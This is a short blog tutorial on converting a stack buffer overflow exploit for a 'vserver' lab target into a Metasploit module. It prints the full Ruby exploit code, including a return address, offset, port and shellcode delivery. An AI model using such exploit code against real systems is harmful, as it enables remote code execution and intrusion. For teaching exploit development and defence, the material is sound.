Tuesday, March 13, 2012

Build Metasploit Module (Windows Exploit Development)

This is the continuation of my previous post Windows Exploit Development (Remote Stack BoF).

Let's try to convert the standalone exploit for vserver to a metasploit module. If you think that this task is complicated you're wrong because what we need, is only a template taken from this corelan tutorial and edit few things.

What we edit:
  • Information details.
  • How much space we have for the shellcode (2062 bytes).
  • Bad chars.
  • Target machine, return address and offset.
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Vserver remote bof',
                        'Description'    => %q{this is a description},
                        'Author'         => [ 'SecurityObscurity' ],
                        'Version'        => '$Revision: 1 $',
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 2062,   
                                        'BadChars' => "\x00",
                                },
                        'Platform'       => 'win',

                        'Targets'        =>
                                [
                                        ['Windows 2003 Server R2 SP2',
                                          { 'Ret' => 0x77384281, 'Offset' => 54  } ],
                                ],
                        'DefaultTarget' => 0,

                        'Privileged'     => false                        ))

                        register_options(
                        [
                                Opt::RPORT(15000)
                        ], self.class)
       end

       def exploit
          connect

           junk = make_nops(target['Offset'])
           eip = [target.ret].pack('V')
           nops = make_nops(50)
           shellcode = payload.encoded

           sock.put(junk+eip+nops+shellcode)

          handler
          disconnect

       end

end
Once finished editing we move the script in a metasploit subfolder (the most appropriate) and then we start metasploit. If once started we don't see errors it means that the module was loaded successfully.

Now it's time to use it.



After setting up remote host and payload we launch the exploit to see if it works.


It works !



As you can see is very easy to convert a standalone exploit to a metasploit module.

Reference:

No comments:

Post a Comment